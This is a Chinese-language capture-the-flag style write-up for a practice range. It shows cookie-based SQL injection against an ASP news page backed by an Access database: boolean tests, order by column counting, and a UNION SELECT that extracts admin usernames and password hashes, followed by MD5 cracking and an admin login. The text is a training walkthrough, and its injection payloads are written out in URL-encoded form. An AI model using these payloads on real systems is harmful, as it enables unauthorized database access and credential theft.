cookie注入

靶场地址：http://kypt8004.ia.aqlab.cn/shownews.asp?id=171

在这个靶场的新闻中心中，我们发现url中带有id参数，尝试试探是否存在sql注入，通过在参数后面添加 and 1=1

 

 

这里经过了特殊处理，被过滤了，所以尝试其他突破点，将参数放入cookie中去尝试是否有效:    id = 171%20and%201%3D1

 

 发现页面正常,之后将 id的值改为 171 and 1=2   id = 171%20and%201%3D2

 

 

发现页面出现问题，说明可能存在sql注入,可以尝试判断字段数和回显点
将id的值改为 171 and 1=1 order by 10   ---id = 171%20and%201%3D1%20order20%by%2010

 

 

 

本次靶场的数据库为Access数据库，所以需要先猜表名，这里存在表admin,news等
将id 的值改为171 and 1=2 union all select 1,2,3,4,5,6,7,8,9,10 from admin ---   id = 171%20and%201%3D2%20union%20all%20select%201%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%20from%20admin

 

 

回显点有 2，3，7，8，9字段位置
接下来猜表中字段，这里我们要的是 admin中的数据，此表中的字段有 username,password
拿到这两个数据
171 and 1=2 union all select 1,username,password,4,5,6,7,8,9,10 from admin
---  id =  171%20and%201%3D2%20union%20all%20select%201%2Cusername%2Cpassword%2c4%2c5%2c6%2c7%2c8%2c9%2c10%20from%20admin

 

 

 

 发现用户名为admin **
密码用md5加密了，所以先进行解密
密码为welcome**
接下来去admin目录拿flag

 

登录：http://kypt8004.ia.aqlab.cn/admin/login.asp  使用  破解的 用户名  和密码登录

 

 

 

 

    郑重感谢笔墨稠思大佬，谢谢